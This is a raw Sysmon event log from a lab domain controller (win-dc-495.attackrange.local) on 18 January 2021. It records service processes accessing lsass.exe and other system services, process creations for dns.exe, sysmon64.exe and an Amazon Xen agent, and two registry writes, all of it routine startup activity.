13:34:14.898{59A5CD1D-8E44-6005-0A00-00000000A301}8482668C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.894{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.894{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.891{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.890{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.890{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:14.890{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:34:14.890{59A5CD1D-8E42-6005-0100-00000000A301}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.886{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.886{59A5CD1D-8E44-6005-0A00-00000000A301}848940C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.873{59A5CD1D-8E56-6005-3100-00000000A301}2524C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.882{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.882{59A5CD1D-8E44-6005-0B00-00000000A301}8562700C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.880{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.879{59A5CD1D-8E44-6005-0A00-00000000A301}8482672C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.841{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.871{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.870{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.870{59A5CD1D-8E44-6005-0A00-00000000A301}8481208C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.837{59A5CD1D-8E56-6005-2900-00000000A301}2768C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.850{59A5CD1D-8E44-6005-0A00-00000000A301}8481108C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.849{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:14.849{59A5CD1D-8E44-6005-0A00-00000000A301}8481100C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-2C00-00000000A301}2588C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.849{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 